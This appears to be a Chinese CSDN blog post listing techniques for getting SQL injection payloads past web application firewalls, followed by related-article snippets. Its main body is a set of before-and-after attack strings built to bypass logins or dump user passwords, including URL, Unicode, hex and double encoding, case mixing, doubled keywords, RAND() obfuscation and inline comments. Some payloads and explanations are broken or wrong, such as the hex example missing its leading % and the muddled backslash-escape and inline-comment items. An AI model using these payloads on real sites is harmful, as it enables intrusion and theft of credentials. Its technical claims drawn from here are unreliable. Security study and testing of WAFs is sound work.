【WAF Bypass】sql注入漏洞的绕过WAF姿势总结

已于 2023-07-31 18:00:01 修改
阅读量3.1k 收藏 12
点赞数 28
文章标签: sql 安全 功能测试
于 2023-05-31 17:42:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46103905/article/details/130964827
版权

提示:本文将会对sql注入常见的手动绕过WAF测试手段进行总结。值得注意的是,目前各大商用WAF(包括网站安全狗)对于sql注入的防御相对比较完善与严格,笔者在汇总这些方式时,分别尝试在部署了最新版网站安全狗或宝塔的靶场构造Payload来绕过,都失败了…希望有大佬能分享更实时的sql注入绕过方式让我们学习。

文章目录

声明

本文总结的绕waf方式仅仅只用于学习网络安全学科,不可以用于非法网络攻击破坏!守护网络安全,人人有责!

一、sql注入绕waf是什么?

SQL注入是指黑客通过在输入的数据中注入恶意的SQL语句来实现绕过应用程序的身份验证和安全措施,直接对数据库进行攻击的一种方式。
而WAF(Web应用程序防火墙)则是一种防御SQL注入攻击的常用措施,它可以在应用程序和数据库之间拦截恶意SQL语句,并阻止攻击者绕过应用程序的身份验证。
然而,有些攻击者会利用一些技巧来绕过WAF的防御措施,这也被称为SQL注入绕WAF攻击。

二、sql注入绕waf姿势总结

1.编码伪装

编码绕过的原理是,攻击者在注入时采用了一些特殊的字符编码方式,从而绕过WAF的检测过程。这种编码绕过的思路就是利用特殊的字符编码方式,将恶意SQL语句转化为WAF规则无法匹配的形式。伪装编码又分为以下几种:

(1)URL编码:
示例:

没有伪装前的payload:

SELECT * FROM users WHERE username = 'admin' or 1 = 1;--' AND password = '123456'

URL编码伪装后的payload:

SELECT%20*%20FROM%20users%20WHERE%20username%20%3D%20%27admin%27%20or%201%20%3D%201%3B--%27%20AND%20password%20%3D%20%27123456%27

(2)Unicode编码:

没有伪装前的payload:

SELECT * FROM users WHERE username = 'admin' OR 1=1 AND password = '123456'

伪装后的payload:

SELECT+*+FROM+users+WHERE+username+=+'%u0061dmin'+OR+1=1%23+AND+password+=+'123456'

(3)十六进制编码:

伪装前payload:

 ' OR 1=1 --

伪装后payload:

27%20%4F%52%201%3D%31%20%2D%2D

【常用】(4)二次编码:
(所举示例来源于:易哲水的博客

伪装前payload:

-1 union select 1,2,3,4#

第一次编码后的payload:

%2d%31%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32%2c%33%2c%34%23

第二次编码后的payload:

%25%32%64%25%33%31%25%32%30%25%37%35%25%36%65%25%36%39%25%36%66%25%36%65%25%32%30%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%33%31%25%32%63%25%33%32%25%32%63%25%33%33%25%32%63%25%33%34%25%32%33

2.转义字符伪装

伪装前

'UNION SELECT username, password FROM users --

伪装后

\' UNION SELECT username, password FROM users --

在上述示例中,攻击者在原始payload中使用了单引号,在单引号前面加上了反斜杠【 \ 】,形成了转义字符 【\ ’ 】。但在程序中,反斜杠本身也是一个转义字符。我们通过将反斜杠和单引号组合使用,就可以在SQL语句中实现一个“接近”的单引号字符,而不是一个完整的单引号字符。这样,攻击者就成功地绕过了对单引号的过滤和校验。

3.随机数混淆

伪装前payload:

UNION SELECT username, password FROM users WHERE id=1

伪装后payload:

' UNION SELECT username, password
FROM users WHERE id=1 AND 1=(SELECT
RAND() < 0.5) --

在这个Payload中,攻击者使用了RAND()函数来生成一个随机数,并将它与0.5进行比较。因为RAND()函数可以返回0到1之间的任意数值,所以此处的比较操作的结果是随机的:有50%的几率生成的随机数小于0.5,50%的几率大于等于0.5。当生成的随机数小于0.5时,Payload会变成:

UNION SELECT username, password FROM users WHERE id=1 AND 1=1

当生成的随机数大于等于0.5时,Payload会变成:

UNION SELECT username, password FROM users WHERE id=1 AND 1=0

这两种情况对应了恶意代码执行成功和失败的情况。同时,攻击者还使用了–注释符号来消除掉多余的Payload,使得恶意代码更加难以被检测到。

采用随机数混淆的策略可以让Payload在每次注入时都不同,从而增加了WAF检测的难度。同时,由于随机数的不可预测性,攻击者可以借助随机的结果来判断注入是否成功,而WAF却无法识别这一点。

4.大小写伪装

这个比较简单了,就是通过大小写混合来伪装,比如:UnIon SeleCt

5.双写伪装

如:UNIunionON SELselectECT 原理也很简单:waf将其识别为普通字符而逃过过滤,但是应用程序按照union select来处理。

6.内联注释伪装

内联注释SQL注入的原理是在注入语句中嵌入内联注释,将恶意SQL代码隐藏在注释中,使之不会被防火墙检测到。例如,攻击者可以在注入语句中夹杂内联注释符号“/* */”,来进行伪装,使应用程序误解为注释掉的一部分代码,而实际上是执行了注入的恶意代码。

如:
’ /!union/ select

总结

针对sql注入攻击的绕过一般是在数据库层面的绕过,需要指出的是,针对
不同的数据库管理系统,其特性不同,绕过方式也存在差异。绕过的核心思路就是通过伪装混淆,逃过waf的过滤规则,但是又能在应用层顺利执行。
sql注入绕过的关键是灵活构造,多次尝试,不过现在waf都很厉害了,sql注入的测试难度都不小。

爱代码的猴子
关注
  • 28
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
*sql注入实战--记一次绕过WTS-WAF拦截注入**
Q963260583的博客
06-04 8870
记一次绕过WTS-WAF拦截注入 关键字搜索 inurl:asp.id= 搜出了一个Asp+Access的小网站,接着尝试进行注入。 但是碰到了拦截,尝试用注释污染参数进行绕过,结果还是不行。 如图所示: 接着尝试改用+号替代空格,居然成功了。 如图: 接着就是尝试用order by 函数匹配了,而且order by 函数也不拦截,得出结果为13. 然后就是进行数据查询了,同时进行表名的猜...
SQL注入-绕过WAF以及一些注入手段
qq_25899635的博客
05-23 5243
大小写绕过   如果程序中设置了过滤关键字,但是过滤过程中并没有对关键字组成进行深入分析过滤,导致只对整体进行过滤。例如:and过滤。当然这种过滤只是发现关键字出现,并不会对关键字处理。可以通过修改关键字的内字母大小写来绕过过滤措施。 双写绕过   如果在程序中设置出现关键字之后替换为空,那么SQl注入攻击也不会发生。对于这样的过滤策略可以使用双写绕过。因为在过滤过程中只进行了一次替换。 例如:过...
我的WafBypass之路(SQL注入篇)
07-11
去年到现在就一直有人希望我出一篇关于waf绕过的文章,我觉得这种老生常谈的话题也没什么可写的。很多人一遇到waf就发懵,不知如何是好,能搜到的各种姿势也是然并卵。但是积累姿势的过程也是迭代的,那么就有了此文,用来总结一些学习和培养突破waf的思想。可能总结的并不全,但目的并不是讲那些网上搜来一大把的东西,So…并不会告诉大家现有的姿势,而是突破Waf Bypass思维定势达到独立去挖掘waf的设计缺陷和如何实现自动化的Waf Bypass(这里只讲主流waf的黑盒测试)
SQL注入漏洞(7)SQL注入高级篇
weixin_51339377的博客
03-18 1402
分析目标防火墙并且跳过 1.直接拉黑ip类防火墙 2.过滤删除相应字符的防火墙 1.waf注释符号过滤 例题:Sqli-labs T23 特点:注释符 --+ # 被过滤掉了 绕过方法:逻辑上补全闭合即可 多加一次url编码只是更安全绕过 select * from users where id = '' limit 0,1 select * from users where id = ' -1' union select 1,2,'3 ' limit 0...
SQL注入漏洞学习小结
dayouzi的博客
08-22 649
Web 程序代码中对于用户提交的参数未做过滤就直接放到SQL 语句中执行,导致参数中的特殊字符打破了 SQL 语句原有逻辑,攻击者可以利用该漏洞执行任意 SQL 语句,如查询数据、下载数据、写入 webshell 、执行系统命令以及绕过登录限制等。
WAF机制及绕过方法总结:注入篇
zhangge3663的博客
05-18 2567
本篇文章主要介绍WAF的一些基本原理,总结常见的SQL注入Bypass WAF技巧。WAF是专门为保护基于Web应用程序而设计的,我们研究WAF绕过的目的一是帮助安服人员了解渗透测试中的测试技巧,而是能够对安全设备厂商提供一些安全建议,及时修复WAF存在的安全问题,以增强WAF的完备性和抗攻击性。三是希望网站开发者明白并不是部署了WAF就可以高枕无忧了,要明白漏洞产生的根本原因,最好能在代码层面上就将其修复。 一、WAF的定义 WAF(Web应用防火墙)是通过执行一系列针对HTTP/HTTPS的安全策略
使用WAF防御网络上的隐蔽威胁之SQL注入攻击
知白的博客
01-16 1777
SQL注入攻击是一种普遍存在且危害巨大的网络安全威胁,它允许攻击者通过执行恶意的SQL语句来操纵或破坏数据库。 这种攻击不仅能够读取敏感数据,还可能用于添加、修改或删除数据库中的记录。因此,了解SQ
sql注入篇--绕过WAF
qq_51003021的博客
08-12 2049
针对WAF绕过
WAFsql注入绕过
Wangguan2931的博客
07-15 585
sql注入绕过
SQL注入如何绕过WAF
qq_55213436的博客
07-15 1370
不知道各位在平时的sql注入漏洞挖掘的过程中是否经常会遇到这样那样版本的安全狗,虽然说安全狗十分的可恶。今天就分享几种常见的安全绕过方法,亲测有效。特别是最后两种方法,100%绕过最新版本的安全狗。.........
第二篇:Bypass X-WAF SQL注入防御(多姿势)1
08-03
Bypass X-WAF SQL注入防御多姿势分析 通过对X-WAF的代码分析,我们可以了解到WAF的工作原理,并找到Bypass的方法。X-WAF是一款适用中、小企业的云WAF系统,让中、小企业也可以非常方便地拥有自己的免费云WAF。 ...
长亭waf绕过1.pdf
07-09
长亭waf绕过1
第09篇:Bypass X-WAF SQL注入防御(多姿势)1
08-03
第09篇:Bypass X-WAF SQL注入防御(多姿势)1
SQL_BypassWaf.pdf
04-08
SQL注入WAF绕过SQL注入是一种常见的网络安全攻击手法,通过在应用程序的输入字段中插入恶意SQL代码,以获取、修改、删除数据库中的数据。而WAF(Web Application Firewall)则是为了防止这种攻击而设立的一道...
Web安全 学习日记6 - SQL注入 WAF绕过和防护方法
qq_46081990的博客
03-12 633
指已存储(数据库、文件)的用户输入被读取后再次进入到 SQL 查询语句中导致的注入。
sql 注入 绕过 waf
3569
07-01 4244
https://notwhy.github.io/2018/06/sql-injection-fuck-waf/0x0 前言 0x1 注入点检测 0x2 bypass waf 0x3 自动化0x0 前言  这里是简单对sql注入绕过waf的一个小总结,非安全研究员,这里不讲原理,关于原理搜集了一些其他大佬的文章(文章在最下面请自取),感谢他们的分享,比着葫芦画瓢,对着各大waf厂商跟着师傅们来一波...
LeetCode //SQL - 196. Delete Duplicate Emails
Made in Code
07-03 932
【代码】LeetCode //SQL - 196. Delete Duplicate Emails。
SQL面试题练习 —— 各用户最长的连续登录天数-可间断
最新发布
hu_wei123的博客
07-06 239
现要求统计各用户最长的连续登录天数,间断一天也算作连续,例如:一个用户在1,3,5,6登录,则视为连续6天登录。首先根据user_id和group_id分组,用datediff计算出出最大登陆日期和最小登陆日期,两者做差+1 得到每次连续登陆的天数。根据用户分组,使用lag函数获得当前行的上一行数据中的日期,使用datediff函数判断日期当期日期与上一行日期的时间差。根据date_diff结果判断是否连续,如果date_diff <= 2则认为连续 我们给赋值为0,否则不连续,赋值为1。
postgresql日志的配置
weixin_44847119的博客
07-03 1090
postgresql日志的配置。
waf绕过sql注入
06-26
Web应用程序防火墙(WAF,Web Application Firewall)是一种网络安全设备或服务,用于检测和阻止针对Web应用的攻击,包括SQL注入等。SQL注入是攻击者通过恶意输入,将SQL代码插入到应用程序的数据库查询中,意图获取敏感信息或篡改数据。 WAF绕过SQL注入通常是攻击者针对WAF安全策略和技术限制来实施的一种技术手段,常见的方法包括: 1. **参数编码和转义**: 攻击者可能会尝试使用特殊字符的转义序列,如\"\'(单引号)或\"\"(双引号),来欺骗WAF,使其误判为合法的输入。 2. **利用WAF规则漏洞**: 一些老旧或配置不当的WAF可能无法识别复杂的注入模式,攻击者会利用这些漏洞进行攻击。 3. **HTTP头部注入**: 攻击者可能会尝试将SQL注入嵌入到HTTP头部请求中,有些WAF可能只关注请求体而忽视头部。 4. **使用存储过程或动态SQL**: 通过调用服务器端已存在的存储过程,或者构造动态SQL,使攻击难以被WAF直接拦截。 5. **利用API或JSON Web Token (JWT)**: 如果攻击发生在API层面,攻击者可能会利用API的认证机制,将SQL注入隐藏在合法的API调用中。 6. **社会工程学攻击**: 通过利用用户信任或权限漏洞,让目标用户执行包含SQL注入的恶意操作。 要防止WAF绕过,应不断更新和强化WAF规则,同时采用多重防御策略,比如使用参数化查询、输入验证、异常处理和对用户输入的深度检查。此外,定期审计和安全测试也是防止此类攻击的重要手段。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值